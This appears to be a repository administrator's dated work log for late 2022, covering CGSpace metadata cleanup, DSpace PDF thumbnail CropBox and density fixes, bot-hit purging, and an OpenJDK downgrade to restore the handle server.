- I'm not sure what was going on on CGSpace yesterday, but the load was indeed very high according to Munin:
![CGSpace CPU load day](/cgspace-notes/2022/10/cpu-day.png)
- The pattern is clear on Sundays if you look at the past month:
![CGSpace CPU load month](/cgspace-notes/2022/10/cpu-month.png)
- I have yet to find an nginx request pattern that correlates with the increased load, but looking back over the last year it seems something started happening around March, 2022, and I also start seeing CPU steal in July (the red coming from the top of the graph):
![CGSpace CPU load year](/cgspace-notes/2022/10/cpu-year.png)
- The amount of CPU steal is very low if I look at it now, around 1 or 2 percent, but what's happening now reminds me of the mysterious load problems I had in 2019-03 that were due to CPU steal
- Salem said there was an issue with the sitemaps on MELSpace so that's why it wasn't working in AReS
- Load on CGSpace is low in the evening so I'll start a new AReS harvest
## 2022-10-18
- Start mapping the Initiative names on CGSpace to the new short names from Enrico's spreadsheet
- Then I will update them for existing CGSpace items:
```console
$ ./ilri/fix-metadata-values.py -i 2022-10-18-update-initiatives.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.initiative -m 258 -t correct -d -n
```
- And later in the controlled vocabulary
- Apply some corrections to a few hundred items on CGSpace for Peter
- Meeting with Abenet, Sara, and Valentina about CG Core types
- We finished going over our list and agreed to send a message to concerned parties in our organizations for feedback by November 4th
- Next week we will continue doing the definitions
- Re-sync CGSpace to DSpace Test to get the latest Initiatives changes
- I also need to re-create the CIAT/Alliance TIP accounts so they can continue testing
- I re-created the tip-submit@cgiar.org and tip-approve@cgiar.org account on DSpace Test
- According to my notes:
- A user must be in the collection admin group in order to deposit via the REST API (not in the collection's "Submit" group, which is for normal submission)
- A user must be in the collection's "Accept/Reject/Edit Metadata" step in order to see and approve the item in the DSpace workflow
- I created a new "TIP test" collection under Alliance's community and added the users accordingly
- I think I'll be able to just add these two submit/approve users to the Alliance Admins and Alliance Editors groups once we're ready
## 2022-10-19
- I submitted a [bug report for the two-page portrait layout of some PDF thumbnails](https://bugs.ghostscript.com/show_bug.cgi?id=705994) on Ghostscript's bug tracker
- For reference, the thumbnail for PDFs like in [10568/116598](https://hdl.handle.net/10568/116598) looks like this:
![gs thumbnail](/cgspace-notes/2022/10/gs-10568-116598.pdf.jpg)
- In other news, I see `pdftocairo` from the poppler package produces a similar, though slightly prettier version of the thumbnail of that PDF:
![pdftocairo thumbnail](/cgspace-notes/2022/10/pdftocairo-10568-116598.pdf.jpg)
- I used the command:
```console
$ pdftocairo -jpeg -singlefile -f 1 -l 1 -scale-to-x 640 -scale-to-y -1 10568-116598.pdf thumb
```
- The Ghostscript developers responded in a few minutes (!) and explained that PDFs can contain many different "boxes":
> PDF files can have multiple different 'Box' values; ArtBox, BleedBox, CropBox, MediaBox and TrimBox. The MediaBox is required the other boxes are optional, a given PDF page description must contain the MediaBox and may contain any or all of the others.
>
> By default Ghostscript uses the MediaBox to determine the size of the media. Other PDF consumers may exhibit other behaviours.
>
> The pages in your PDF file contain all of the Boxes. In the majority of cases the Boxes all contain the same values (which makes their inclusion pointless of course). But for page 1 they differ:
>
> /CropBox[594.375 0.0 1190.55 839.176]
> /MediaBox[0.0 0.0 1190.55 841.89]
>
> You can tell Ghostscript to use a different Box value for the media by using one of -dUseArtBox, -dUseBleedBox, -dUseCropBox, -dUseTrimBox. If I specify -dUseCropBox then the file is rendered as you expect.
- I confirm that adding `-define pdf:use-cropbox=true` to the ImageMagick command produces a better thumbnail in this case
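- For example, a sketch of the kind of command I mean (density, geometry, and output path here are just illustrative):
```console
$ convert -define pdf:use-cropbox=true -density 72 data/10568-116598.pdf\[0\] -thumbnail x300 /tmp/10568-116598-cropbox.pdf.jpg
```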
- We can check the boxes in a PDF using `pdfinfo` from the poppler package:
```console
$ pdfinfo -box data/10568-116598.pdf
Creator: Adobe InDesign 17.0 (Macintosh)
Producer: Adobe PDF Library 16.0.3
CreationDate: Tue Dec 7 12:44:46 2021 EAT
ModDate: Tue Dec 7 15:37:58 2021 EAT
Custom Metadata: no
Metadata Stream: yes
Tagged: no
UserProperties: no
Suspects: no
Form: none
JavaScript: no
Pages: 17
Encrypted: no
Page size: 596.175 x 839.176 pts
Page rot: 0
MediaBox: 0.00 0.00 1190.55 841.89
CropBox: 594.38 0.00 1190.55 839.18
BleedBox: 594.38 0.00 1190.55 839.18
TrimBox: 594.38 0.00 1190.55 839.18
ArtBox: 594.38 0.00 1190.55 839.18
File size: 572600 bytes
Optimized: no
PDF version: 1.6
```
- In this case the MediaBox is a strange size, and we should use the CropBox
- I wonder if we can check that from DSpace...
- Apply some corrections from Peter on CGSpace
- Meeting with Leroy, Daniel, Francesca, and Maria from Alliance to review their TIP tool and talk about next steps
- We asked them to do some real submissions (as opposed to "I like coffee" etc) to test the full breadth of the metadata and controlled vocabularies
- Minor work on the CG Core Types spreadsheet to clear up some of the actions and incorporate some of Peter's feedback
- After looking at the request patterns in nginx on CGSpace for the past few weeks I see nothing that would explain the high loads we see several times per week (especially Sundays!)
- So I suspect there is a noisy neighbor, and actually I do see some non-trivial amount of CPU steal in my Munin graphs and `iostat`
- I asked Linode to move the instance elsewhere
## 2022-10-22
- Start a harvest on AReS
## 2022-10-24
- Peter sent me some corrections for affiliations:
```console
$ cat 2022-10-24-affiliations.csv
cg.contributor.affiliation,correct
Wageningen University and Research Centre,Wageningen University & Research
Wageningen University and Research,Wageningen University & Research
Wageningen University,Wageningen University & Research
$ ./ilri/fix-metadata-values.py -i 2022-10-24-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
```
- Add ORCID identifier for Claudia Arndt on CGSpace and tag her existing items
- Linode responded to my request last week and said they don't think that the culprit here is CPU steal, but that they would move us to another host anyways
- I still need to check the Munin graphs
## 2022-10-25
- Upload some changes to items on CGSpace for Peter
- Start a full Discovery index on CGSpace:
```console
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 226m40.463s
user 132m6.511s
sys 3m15.077s
```
## 2022-10-26
- We published the [infographic](https://hdl.handle.net/10568/125167) and [blog post](https://www.ilri.org/news/celebrating-open-access-cgspace) to mark CGSpace's 100,000th item
- I generated a high-quality thumbnail using ImageMagick in order to Tweet it:
```console
$ convert -density 144 10568-125167.pdf\[0\] -thumbnail x1200 /tmp/10568-125167.pdf.png
$ pngquant /tmp/10568-125167.pdf.png
```
- Spent some time looking at the MediaBox / CropBox thing in DSpace's `ImageMagickThumbnailFilter.java`
- We need to make sure to put `-define pdf:use-cropbox=true` before we specify the input file or else it will not have any effect
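- For example (illustrative geometry), the first of these respects the CropBox while the second silently falls back to the MediaBox:
```console
# define before the input file: CropBox is used when reading the PDF
$ convert -define pdf:use-cropbox=true 10568-116598.pdf\[0\] -thumbnail x600 /tmp/good.jpg
# define after the input file: too late, the PDF was already read using the MediaBox
$ convert 10568-116598.pdf\[0\] -define pdf:use-cropbox=true -thumbnail x600 /tmp/bad.jpg
```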
## 2022-10-27
- I found out that we can use [pdfcpu to remove the CropBox from a PDF](https://pdfcpu.io/boxes/boxes_remove.html#examples) for testing:
```console
$ pdfcpu box rem -- "crop" in.pdf out.pdf
```
- I filed [an issue on DSpace](https://github.com/DSpace/DSpace/issues/8549) for the ImageMagick `CropBox` problem
- I decided that this is a bug that should be fixed separately from the "improving thumbnail quality" issue
- I made [a pull request](https://github.com/DSpace/DSpace/pull/8550) to fix the `CropBox` issue
- I did more work on my [improved-dspace-thumbnails](https://github.com/alanorth/improved-dspace-thumbnails/) microsite to complement the DSpace thumbnail pull requests
- I am updating it to recommend using the PDF cropbox and "supersampling" with a higher density than 72
- I measured execution time of ImageMagick with `time` and found that the higher-density mode takes about five times longer on average
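- The comparison was roughly like this (file and geometry illustrative), timing the default density against the "4x" supersampled one:
```console
$ time convert -density 72 data/10568-116598.pdf\[0\] -thumbnail x300 /tmp/default.pdf.jpg
$ time convert -density 288 data/10568-116598.pdf\[0\] -thumbnail x300 /tmp/supersampled.pdf.jpg
```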
- I measured the [maximum heap memory of ImageMagick with Valgrind and Massif](https://stackoverflow.com/a/131346):
```console
$ valgrind --tool=massif magick convert ...
```
- Then I checked the results for each set of default DSpace thumbnail runs and "improved" thumbnail runs using `ms_print` (hacky way to get the max heap, I know):
```console
$ for file in memory-dspace/massif.out.49*; do ms_print "$file" | grep -A1 " MB" | tail -n1 | sed 's/\^.*//'; done
15.87
16.06
21.26
15.88
20.01
15.85
20.06
16.04
15.87
15.87
20.02
15.87
15.86
19.92
10.89
$ for file in memory-improved/massif.out.5*; do ms_print "$file" | grep -A1 " MB" | tail -n1 | sed 's/\^.*//'; done
245.3
245.5
298.6
245.3
306.8
245.2
306.9
245.5
245.2
245.3
306.8
245.3
244.9
306.3
165.6
```
- Ouch, this shows that it takes about *fifteen times* more memory to do the "4x" density of 288!
- It seems more reasonable to use a "2x" density of 144:
```console
$ for file in memory-improved-144/*; do ms_print "$file" | grep -A1 " MB" | tail -n1 | sed 's/\^.*//'; done
61.80
62.00
76.76
61.82
77.43
61.77
77.48
61.98
61.76
61.81
77.44
61.81
61.69
77.16
41.84
```
- There's a really cool visualizer called massif-visualizer, but the raw massif output format itself isn't easy to parse
## 2022-10-28
- I finalized the code for the ImageMagick density change and made a [pull request](https://github.com/DSpace/DSpace/pull/8553) against DSpace 7.x
## 2022-10-29
- Start a harvest on AReS
## 2022-10-31
- Tag version 6.1 of cgspace-java-helpers: https://github.com/ilri/cgspace-java-helpers/releases/tag/v6.1
- I also pushed a more recent `6.1-SNAPSHOT` version to Maven Central via OSSRH
- I should probably push a non-SNAPSHOT release, but I don't have time to figure that out in Maven
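- For reference, pushing a snapshot is roughly just this, assuming the OSSRH credentials and `distributionManagement` are already configured in the POM and `settings.xml`:
```console
$ mvn clean deploy
```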
- Add some new items on CGSpace and update others for Peter
- Email Mishell from CIP about their [old theses](https://cgspace.cgiar.org/handle/10568/125218) which are using Creative Commons licenses
- They said it's OK so I updated all sixteen items in that collection
- Move the "MEL submissions" collection on CGSpace from ICARDA's community to the Initiatives community
- Meeting with Peter and Abenet about ongoing CGSpace action points
- I created the authorizations for Alliance's TIP tool to submit on CGSpace
<!-- vim: set sw=2 ts=2: -->

content/posts/2022-11.md
---
title: "November, 2022"
date: 2022-11-01T09:11:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-11-01
- Last night I re-synced DSpace 7 Test from CGSpace
- I also updated all my local `7_x-dev` branches on the latest upstreams
- I spent some time updating the authorizations in Alliance collections
- I want to make sure they use groups instead of individuals where possible!
- I reverted the Cocoon autosave change because it was more of a nuisance that Peter couldn't upload CSVs from the web interface, and the underlying security issue is of very low severity
<!--more-->
- I ran FixLowQualityThumbnails from cgspace-java-helpers on some large collections on CGSpace and ended up fixing 194 items!
- I did some minor checking and uploaded twenty-four IFPRI outputs for the Initiatives to DSpace Test
- Tim merged my [pull request to override the ImageMagick PDF density in DSpace 7](https://github.com/DSpace/DSpace/pull/8553)
- I ported it to DSpace 6.x and submitted a pull request: https://github.com/DSpace/DSpace/pull/8560
## 2022-11-02
- I joined the FAO-CGIAR AGROVOC results sharing meeting
- From June to October, 2022 we suggested 39 new keywords: 27 were added to AGROVOC, 4 were rejected, and 9 are still under discussion
- Doing duplicate check on IFPRI's batch upload and I found one duplicate uploaded by IWMI earlier this year
- I will update the metadata of that item and map it to the correct Initiative collection
## 2022-11-03
- I added countries to the twenty-three IFPRI items in OpenRefine based on their titles and abstracts (using the Jython trick I learned a few months ago), then added regions using csv-metadata-quality, and uploaded them to CGSpace
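- The region step was a normal csv-metadata-quality run over the exported CSV, roughly like this (file names illustrative):
```console
# -u enables the "unsafe" fixes, which include adding missing UN M.49 regions
$ csv-metadata-quality -i /tmp/2022-11-03-ifpri.csv -o /tmp/2022-11-03-ifpri-cleaned.csv -u
```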
- I exported a list of collections from CGSpace so I can run the thumbnail fixes on each, as we seem to have issues when doing it on (some) large communities like the CRP community:
```console
localhost/dspace= ☘ \COPY (SELECT ds6_collection2collectionhandle(uuid) AS collection FROM collection) to /tmp/collections.txt
COPY 1268
```
- Then I started a test run on DSpace Test:
```console
$ while read -r collection; do chrt -b 0 dspace dsrun io.github.ilri.cgspace.scripts.FixLowQualityThumbnails $collection | tee -a /tmp/FixLowQualityThumbnails.log; done < /tmp/collections.txt
```
- I'll be curious to check the log after it's all done.
- After a few hours I see:
```console
$ grep -c 'Action: remove' /tmp/FixLowQualityThumbnails.log
626
```
- Not bad, because last week I did a more manual selection of collections and deleted ~200
- I will replicate this on CGSpace soon, and also try the FixJpgJpgThumbnails tool
- I see that the CIAT Library is still up, so I should really grab all the PDFs before they shut that old server down
- Export a list of items with PDFs linked there:
```console
localhost/dspacetest= ☘ \COPY (SELECT dspace_object_id,text_value FROM metadatavalue WHERE metadata_field_id=219 AND text_value LIKE '%ciat-library%') to /tmp/ciat-library-items.csv;
COPY 4621
```
- After stripping the page numbers off I see there are only about 2,700 unique files, and we have to filter the dead JSPUI ones...
```console
$ csvcut -c url 2022-11-03-CIAT-Library-items.csv | sed 1d | grep -v jspui | sort -u | wc -l
2752
```
- I'm not sure how we'll handle the duplicates because many items are book chapters or something where they share a PDF
## 2022-11-04
- I decided to check for old pre-ImageMagick thumbnails on CGSpace by finding any bitstreams with the description "Generated Thumbnail":
```console
localhost/dspacetest= ☘ \COPY (SELECT ds6_bitstream2itemhandle(dspace_object_id) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND text_value='Generated Thumbnail') to /tmp/old-thumbnails.txt;
COPY 1147
$ grep -v '\\N' /tmp/old-thumbnails.txt > /tmp/old-thumbnail-handles.txt
$ wc -l /tmp/old-thumbnail-handles.txt
987 /tmp/old-thumbnail-handles.txt
```
- A bunch of these have `\N` for some reason when I use the `ds6_bitstream2itemhandle` function to get their handles so I had to exclude those...
- I forced the media-filter for these items on CGSpace:
```console
$ while read -r handle; do JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -i $handle -f -v; done < /tmp/old-thumbnail-handles.txt
```
- Upload some batch records via CSV for Peter
- Update the about page on CGSpace with new text from Peter
- Add a few more ORCID identifiers and names to my growing file `2022-09-22-add-orcids.csv`
- I tagged fifty-four new authors using this list
- I deleted and mapped one duplicate item for Maria Garruccio
- I updated the CG Core website from Bootstrap v4.6 to v5.2
## 2022-11-07
- I did a harvest on AReS last night but it seems that MELSpace's sitemap is broken again because we have 10,000 fewer records
- I filed [an issue](https://github.com/ecrmnn/iso-3166-1/issues/10) on the iso-3166-1 npm package to update the name of Turkey to Türkiye
- I also filed [an issue](https://github.com/flyingcircusio/pycountry/issues/148) and [a pull request](https://github.com/flyingcircusio/pycountry/pull/149) on the pycountry package
- I also filed [an issue](https://github.com/konstantinstadler/country_converter/issues/121) and [a pull request](https://github.com/konstantinstadler/country_converter/pull/122) on the country-converter package
- I also changed one item on CGSpace that had been submitted since the name was changed
- I also imported the new iso-codes 4.12.0 into cgspace-java-helpers
- I also updated it in the DSpace `input-forms.xml`
- I also forked the iso-3166-1 package from npm and updated Swaziland, Macedonia, and Turkey in my fork
- I submitted a [pull request](https://github.com/ecrmnn/iso-3166-1/pull/11) to update this upstream
- Since I was making all these pull requests I also made [one on country-converter for the UN M.49 region "South-eastern Asia"](https://github.com/konstantinstadler/country_converter/pull/123)
- Port the [ImageMagick PDF cropbox fix](https://github.com/DSpace/DSpace/pull/8550) to DSpace 6.x
- I deployed it on CGSpace, ran all updates, and rebooted the host
- I ran the filter-media script on one large collection where many of these PDFs with cropbox issues exist:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -v -f -i 10568/78 >& /tmp/filter-media-cropbox.log
```
- But looking at the items it processed, I'm not sure it's working as expected
- I looked at a few dozen
- I found some links to the Bioversity website on CGSpace that are not redirecting properly:
```console
$ http --print Hh http://www.bioversityinternational.org/nc/publications/publication/issue/geneflow_2004.html
GET /nc/publications/publication/issue/geneflow_2004.html HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: www.bioversityinternational.org
User-Agent: HTTPie/3.2.1
HTTP/1.1 302 Found
Connection: Keep-Alive
Content-Length: 275
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Nov 2022 16:35:21 GMT
Keep-Alive: timeout=15, max=100
Location: https://www.bioversityinternational.orgnc/publications/publication/issue/geneflow_2004.html
Server: Apache
```
- The `Location` header is clearly wrong, and if I try https directly I get an HTTP 500
## 2022-11-08
- Looking at the Solr statistics hits on CGSpace for 2022-11
- I see 221.219.100.42 is on China Unicom and was making thousands of requests to XMLUI in a few hours, using a normal user agent
- I see 122.10.101.60 is in Hong Kong and making thousands of requests to XMLUI handles in a few hours, using a normal user agent
- I see 135.125.21.38 on OVH is making thousands of requests trying to do SQL injection
- I see 163.237.216.11 is somewhere in California making thousands of requests with a normal user agent
- I see 51.254.154.148 on OVH is making thousands of requests trying to do SQL injection
- I see 221.219.103.211 is on China Unicom and was making thousands of requests to XMLUI in a few hours, using a normal user agent
- I see 216.218.223.53 on Hurricane Electric making thousands of requests to XMLUI in a few minutes using a normal user agent
- I will purge all these hits and probably add China Unicom's subnet to my nginx `bot-network.conf` file to tag them as bots, since there are SO many bad and malicious requests coming from there
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 8975 hits from 221.219.100.42 in statistics
Purging 7577 hits from 122.10.101.60 in statistics
Purging 6536 hits from 135.125.21.38 in statistics
Purging 23950 hits from 163.237.216.11 in statistics
Purging 4093 hits from 51.254.154.148 in statistics
Purging 2797 hits from 221.219.103.211 in statistics
Purging 2618 hits from 216.218.223.53 in statistics
Total number of bot hits purged: 56546
```
- Also interesting to see a few new user agents:
- `RStudio Desktop (2022.7.1.554); R (4.2.1 x86_64-w64-mingw32 x86_64 mingw32)`
- `rstudio.cloud R (4.2.1 x86_64-pc-linux-gnu x86_64 linux-gnu)`
- `MEL`
- `Gov employment data scraper ([[your email]])`
- `RStudio Desktop (2021.9.0.351); R (4.1.1 x86_64-w64-mingw32 x86_64 mingw32)`
- I will purge all these:
```console
$ ./ilri/check-spider-hits.sh -f /tmp/agents.txt -p
Purging 6155 hits from RStudio in statistics
Purging 1929 hits from rstudio in statistics
Purging 1454 hits from MEL in statistics
Purging 1094 hits from Gov employment data scraper in statistics
Total number of bot hits purged: 10632
```
- Work on the CIAT Library items a bit again in OpenRefine
- I flagged items with:
- URL containing "#page" at the end (these are linking to book chapters, but we don't want to upload the PDF multiple times)
- Same URL used by more than one item ("Duplicates" facet in OpenRefine, these are some corner case I don't want to handle right now)
- URL containing ":8080" to CIAT's old DSpace (this server is no longer live)
- I want to try to handle the simple cases that should cover most of the items first
## 2022-11-09
- Continue working on the Python script to upload PDFs from CIAT Library to the relevant item on CGSpace
- I got the basic functionality working
## 2022-11-12
- Start a harvest on AReS
## 2022-11-15
- Meeting with Marie-Angelique, Sara, and Valentina about CG Core types
- We agreed to continue adding the feedback for each of the proposed actions
- The others will start filling in definitions for the types
- Sara had some good questions about duplicates on CGSpace and how we can possibly prevent them now that several systems are submitting items directly into the repository
- We need to be careful especially with regards to author's outputs that will be reported in the PRMS
## 2022-11-16
- Maria asked if we can extend the timeout for XMLUI sessions
- According to [this issue](https://gitlab.inf.unibz.it/commul/docker/clarin-dspace/-/issues/44) it seems to be 30 minutes by default, as a Tomcat default
- I think we could extend this to an hour, as there is no real security risk (we're not a bank) and most users' lock screens would have activated after ten minutes or so anyways
## 2022-11-20
- Start a harvest on AReS
## 2022-11-22
- Check and upload some items to CGSpace for Peter
- I am waiting for some feedback from him about some duplicates and metadata issues for the rest
## 2022-11-23
- Fix some authorization issues for ABC's TIP submit tool on DSpace Test (the groups were correct on CGSpace, but not on test)
- Peter sent me feedback about the duplicates and metadata questions from yesterday
- I uploaded the eight items for COHESA and sixty-two for Gender
- I ran the script to tag ORCID identifiers with my `2022-09-22-add-orcids.csv` file and tagged twenty-seven
- Maria asked for help uploading a large PDF to CGSpace
- The PDF is only two pages, but it is 139MB!
- I decided to compress it with GhostScript, first with the screen profile (72dpi), then with the ebook profile (150dpi):
```console
$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/screen -dNOPAUSE -dQUIET -dBATCH -sOutputFile=Key\ facts\ from\ a\ traditional\ colombian\ food\ market-screen.pdf Key\ facts\ from\ a\ traditional\ colombian\ food\ market.pdf
$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -sOutputFile=Key\ facts\ from\ a\ traditional\ colombian\ food\ market-ebook.pdf Key\ facts\ from\ a\ traditional\ colombian\ food\ market.pdf
```
- The ebook one looks really good and is only 2.4MB...
- But for reference, this free Adobe tool seems to work: https://www.adobe.com/acrobat/online/compress-pdf.html
## 2022-11-24
- My script finished downloading the CIAT Library PDFs
- I did some more work on my `post-ciat-pdfs.py` script and tested uploading the items to my local DSpace and DSpace Test
- Then I ran the script on CGSpace, uploading ~1,500 PDFs to existing items
## 2022-11-25
- Tony Murray, who is working on IFPRI's CGSpace integration, emailed me to ask some questions about the REST API
- Oh no, I realized there is a logic issue with the PDFbox cropbox code I added a few weeks ago:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -v -f -i 10568/77010
The following MediaFilters are enabled:
Full Filter Name: org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter
org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter
Loading @mire database changes for module MQM
Changes have been processed
IM Thumbnail tropentag2016_marshall.pdf is replacable.
File: tropentag2016_marshall.pdf.jpg
ERROR filtering, skipping bitstream:
Item Handle: 10568/77010
Bundle Name: ORIGINAL
File Size: 1486580
Checksum: 1ad66d918a56a5e84667386e1a32e352 (MD5)
Asset Store: 0
java.lang.IndexOutOfBoundsException: 1-based index out of bounds: 2
java.lang.IndexOutOfBoundsException: 1-based index out of bounds: 2
at org.apache.pdfbox.pdmodel.PDPageTree.get(PDPageTree.java:325)
at org.apache.pdfbox.pdmodel.PDPageTree.get(PDPageTree.java:248)
at org.apache.pdfbox.pdmodel.PDDocument.getPage(PDDocument.java:1543)
at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:167)
at org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.getDestinationStream(ImageMagickPdfThumbnailFilter.java:27)
at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:232)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
```
- Salem gave me a list of CGSpace collections that have double spaces in the names
- Normally this would only be a minor annoyance, but he discovered that the REST API seems to trim the spaces, which causes an issue when trying to reference them!
- He sent me a list of about ten collection UUIDs so I fixed them
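- For the record, a quick way to find collection names with double spaces (a sketch against the DSpace 6 schema, where collection titles are stored in `metadatavalue`):
```console
localhost/dspace= ☘ SELECT dspace_object_id, text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM collection) AND text_value LIKE '%  %';
```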
- I found a bunch of LIVES presentation items on CGSpace that link to presentations on SlideShare with incorrect licenses... I updated about fifty of them
## 2022-11-26
- Sync DSpace Test with CGSpace
- I increased the session timeout in Tomcat from thirty minutes to sixty, as requested by Maria a few weeks ago
- See: https://gitlab.inf.unibz.it/commul/docker/clarin-dspace/-/issues/44
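- The change itself is just the `session-timeout` element in Tomcat's `web.xml` (a sketch; the value is in minutes):
```console
<session-config>
    <session-timeout>60</session-timeout>
</session-config>
```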
- I re-built DSpace on CGSpace, ran all updates, and rebooted the machine
- Then after coming back up the handle server won't start
- The `handle-server.log` file shows:
```console
Shutting down...
"2022/11/26 02:12:17 CET" 25 Rotating log files
Error: null
(see the error log for details.)
```
- In the `error.log` file I see:
```console
"2022/11/26 02:12:18 CET" 25 Started new run.
java.lang.UnsupportedOperationException
at java.lang.Runtime.runFinalizersOnExit(Runtime.java:287)
at java.lang.System.runFinalizersOnExit(System.java:1059)
at net.handle.server.Main.initialize(Main.java:124)
at net.handle.server.Main.main(Main.java:75)
Shutting down...
```
- Ah, it seems to be due to an [issue in OpenJDK 1.8.0_352](https://groups.google.com/g/dspace-tech/c/PqjfA5mqG4w/m/FhxI5oXhFwAJ?pli=1)
- I see the server upgraded to the new JDK version on 2022-11-10:
```console
Upgrade: openjdk-8-jdk-headless:amd64 (8u342-b07-0ubuntu1~20.04, 8u352-ga-1~20.04), openjdk-8-jre-headless:amd64 (8u342-b07-0ubuntu1~20.04, 8u352-ga-1~20.04)
End-Date: 2022-11-10 04:10:45
```
- As highlighted in the dspace-tech mailing list thread above, [this OpenJDK release deprecated `Runtime.runFinalizersOnExit`](https://mail.openjdk.org/pipermail/jdk8u-dev/2022-October/015706.html):
```console
- JDK-8287132: Retire Runtime.runFinalizersOnExit so that it always throws UOE
```
- I downloaded the previous versions of the packages from Launchpad:
```console
# wget https://launchpad.net/~openjdk-security/+archive/ubuntu/ppa/+build/24195357/+files/openjdk-8-jdk-headless_8u342-b07-0ubuntu1~20.04_amd64.deb
# wget https://launchpad.net/~openjdk-security/+archive/ubuntu/ppa/+build/24195357/+files/openjdk-8-jre-headless_8u342-b07-0ubuntu1~20.04_amd64.deb
# dpkg -i openjdk-8-j*8u342-b07*.deb
```
- Then the handle-server process starts up fine, so I held these OpenJDK versions for now:
```console
# apt-mark hold openjdk-8-jdk-headless:amd64 openjdk-8-jre-headless:amd64
openjdk-8-jdk-headless set on hold.
openjdk-8-jre-headless set on hold.
```
- Start a harvest on AReS
## 2022-11-27
- I realized I made a mistake in the PDF CropBox code I wrote for dspace-api a few weeks ago
- For PDFs with only one page I was seeing this in the filter-media output:
```console
java.lang.IndexOutOfBoundsException: 1-based index out of bounds: 2
```
- It turns out that [PDDocument's getPage() is zero-based](https://javadoc.io/static/org.apache.pdfbox/pdfbox/2.0.27/org/apache/pdfbox/pdmodel/PDDocument.html#getPage-int-)
- I also updated PDFBox from 2.0.24 to 2.0.27
- I synced DSpace 7 Test with CGSpace
- I had to follow my notes from 2022-03 to delete the missing Atmire migrations
## 2022-11-28
- Update `ilri/fix-metadata-values.py` to update the `last_modified` date for items when it updates metadata
- This should allow us to use the normal `index-discovery` (without `-b`) as well as have REST API responses show a correct last modified date
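- The timestamp update itself is essentially just this per item (placeholder UUID):
```console
localhost/dspace= ☘ UPDATE item SET last_modified=NOW() WHERE uuid='aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee';
```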
- Maria asked me to add some ORCID identifiers for Alliance staff to the controlled vocabulary
- I also updated the `add-orcid-identifiers-csv.py` to update the `last_modified` timestamp of the item
- I re-factored my CGSpace Python scripts to use a helper `util.py` module with common functions
- For now it only has the one for updating an item's `last_modified` timestamp but I will gradually add more
- I also ran our list of ORCID identifiers against ORCID's API to see if anyone changed their name format
- Then I ran them on CGSpace with `ilri/update-orcids.py` to fix them
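- That is the usual two-step process with my scripts (file names illustrative):
```console
$ ./ilri/resolve-orcids.py -i /tmp/current-orcids.txt -o /tmp/current-orcid-names.txt -d
$ ./ilri/update-orcids.py -i /tmp/current-orcid-names.txt -db dspace -u dspace -p 'fuuu' -m 247
```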
- Normalize the `text_lang` values for CGSpace metadata again:
```console
localhost/dspacetest= ☘ SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang │ count
───────────┼─────────
en_US │ 2912429
│ 108387
en │ 12457
fr │ 2
vi │ 2
es │ 1
␀ │ 0
(7 rows)
Time: 624.651 ms
localhost/dspacetest= ☘ BEGIN;
BEGIN
Time: 0.130 ms
localhost/dspacetest= ☘ UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', '');
UPDATE 120844
Time: 4074.879 ms (00:04.075)
localhost/dspacetest= ☘ SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang │ count
───────────┼─────────
en_US │ 3033273
fr │ 2
vi │ 2
es │ 1
␀ │ 0
(5 rows)
Time: 346.913 ms
localhost/dspacetest= ☘ COMMIT;
```
- Discussing the UN M.49 regions on CGSpace with Valentina and Abenet
- The PRMS team is confused about our regions, which are mostly UN M.49 with some legacy stuff using different ones
- I think we can fix all the stuff for Initiatives from this year very easily, then work on the legacy stuff later
- Also, I noticed that that [country_converter was using the wrong UN M.49 region for Myanmar](https://github.com/konstantinstadler/country_converter/issues/124)
- I submitted a [pull request](https://github.com/konstantinstadler/country_converter/pull/125)
- I exported a CSV of the Initiatives and ran the csv-metadata-quality script to add missing UN M.49 regions
- To make sure everything was correct I got a list of the changes from csv-metadata-quality and checked them all manually on the UN M.49 site, just in case there was another bug in country_converter
